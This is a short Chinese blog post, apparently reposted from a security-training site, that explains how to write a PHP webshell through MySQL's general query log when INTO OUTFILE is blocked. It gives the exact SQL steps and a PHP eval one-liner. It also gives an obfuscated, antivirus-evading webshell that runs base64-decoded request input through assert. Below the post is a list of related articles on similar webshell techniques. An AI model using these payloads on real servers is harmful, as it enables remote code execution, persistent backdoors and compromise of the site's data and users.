SQL语句利用日志写shell

最新推荐文章于 2024-07-01 22:54:08 发布
最新推荐文章于 2024-07-01 22:54:08 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: webshell 渗透测试

outfile被禁止,或者写入文件被拦截

在数据库中操作如下:(必须是root权限)

1.show variables like ‘%general%'; #查看配置

2.set global general_log = on; #开启general log模式

3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为shell地址

4.select ‘<?php eval($_POST[cmd]);?>’ #写入shell

不成功的案例,如果mysql 被降权,是无法写入到其他的站点目录的,除非你的目标目录是可以写入的。

SQL查询免杀shell的语句

SELECT “<?php $p = array(‘f’=>’a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a = array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_= ‘a’.$_.’rt';$_(base64_decode($_REQUEST[‘username’]));?>”

 

转自:墨者学院https://www.mozhe.cn/news/detail/32

多崎巡礼
关注
专栏目录
mysql log shell_利用mysql general log shell 可行性简要分析
weixin_39867594的博客
02-05 809
0×01 前言实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfileshell的时候,却怎么都不进去,前提可以肯定的是,我们对目标的网站目录绝对是有权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你0×02 拿shell利用mys...
Shell执行脚本并输出日志文件的方法
xiaoweids的博客
06-28 6912
本文主要介绍了Shell执行脚本并输出日志文件的方法,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下shell 错误输出重定向到标准输出1>和&1的意思就是将标准错误也输出到标准输出当中。下面通过一个例子来展示2>&1有什么作用:123cat。
对SQL注入webshell的实验
最新发布
wangqiao258的博客
07-01 288
1.知道网站绝对路径2.数据库ROOT权限3.secure_file_priv不为NULL,为空或为网站路径查询mysql路径,猜测网站绝对路径查询当前用户查询secure_file_priv入webshell测试shell
Mysql 后台日志shell(root权限)
haoge1998的博客
04-15 1862
Mysql shell 一、后台日志shell 前提: 需要有root权限 outfile被禁止 文件入被拦截 1、查看配置 是否开启日志 日志入路径 show variables like '%general%'; 2、开启general log模式为on set global general_log = on; 3、设置目录为shell地址 set global general_log_file = '/var/www/html'; 4、shell select '<?
shell脚本读取日志拼接成sql执行到mysql数据库
shelly南瓜
12-20 1541
一个处理日志的脚本,待优化(ps:第一次小shell脚本,坑多,记录下)
Shell脚本中执行sql语句操作mysql的5种方法
09-15
### Shell脚本中执行SQL语句操作MySQL的五种方法详解 #### 一、引言 在日常的系统管理和维护工作中,尤其是对于自动化运维任务,如数据库备份与恢复等场景,常常需要通过Shell脚本来执行SQL语句来操作MySQL数据库。...
Django shell调试models输出的SQL语句方法
09-18
总的来说,通过正确配置日志和使用shell或`shell_plus`,开发者可以在Django中方便地查看和调试models执行的SQL语句,这对于理解和优化应用程序的数据库性能至关重要。确保了解和掌握这些技巧,可以显著提高开发效率...
大数据进阶之路——Spark SQL日志分析_spark 捕获异常sql语句(1)
2401_84183492的博客
04-28 503
执行第一步数据清洗时候,数据能打印出来,但是不能入本地文件,这是因为本地没有hadoop伪分布式系统。按照日志中的访问时间进行相应的分区,比如:d,h,m5(每5分钟一个分区)下载上述插件,然后,新建目录并且放入到目录里面。一般的日志处理方式,我们是需要进行分区的,3)安装jar包到自己的maven仓库。使用github上已有的开源项目。找到分割后各个字段的对应的。检查插入参数和类型是否一直。然后再系统环境变量添加。
mysql监视执行sql语句_监控mysql执行的sql语句
weixin_34773479的博客
02-05 2821
linux平台 监控mysql执行的sql语句 为了做好配合开发做性能和功能测试,方便监控正在执行的sql语句, 可以在/etc/mysqld中添加如下: log =/usr/local/mysql/var21005/mysql.log 就可以使用: tail -f mysql.log 来监控了 www.2cto.com 如果需要监控慢查询可以添加如下内容: log-slow-q...
mysql日志浅析
weixin_33843947的博客
04-12 84
mysql日志浅析 mysql 日志种类一般分为错误日志,二进制日志,一般查询日志,慢查询日志,和中继日志。通常要开启的日志是错误日志和二进制日志,二进制日志尤为重要。下面介绍这几种日志。 一,错误日志, 顾名思义,就是记录系统错误信息...
sqlserver手注getshell分析:
m0_59757868的博客
08-19 2578
sqlmap
Shell脚本变量、脚本编和执行(部署Apache与远程备份MySQL数据库)
XinCenWeiSei的博客
05-12 487
1、Shell脚本基础 (1)查看Shell脚本种类,使用/bin/bash [root@localhost ~]# cat /etc/shells /bin/sh /bin/bash ...... (2)创建一个Shell脚本 vim first.sh (新建first.sh文件) #!/bin/bash (特殊脚本说明) #This...
Linux 编shell脚本记录操作用户日志信息
G925010178的博客
08-31 2061
Linux记录用户操作日志shell脚本
mysqlshell
weixin_47385895的博客
08-22 1975
mysql常见shell方法
墨者学院 - SQL注入实战(防注入)-Access
多崎巡礼的博客
09-04 1541
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码 必应一下 access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中入一句话 在url后面添加一句话代码and 1=&lt;%eval request("chopper")%&gt;,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了 ...
墨者学院 - SQL注入实战-MySQL
多崎巡礼的博客
08-08 2019
两种解法 一、利用sqlmap及其tamper模块base64encode使用 1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1 2.查看当前的系统信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴库 sqlmap -u "http:/...
360天擎SQL注入漏洞分析:创建表与shell
1. **参数化查询**:使用预编译语句或参数化查询,确保用户输入不会影响SQL语句的结构。 2. **输入验证**:对所有输入数据进行严格的类型和格式验证,拒绝不符合预期的数据。 3. **权限限制**:为应用服务数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值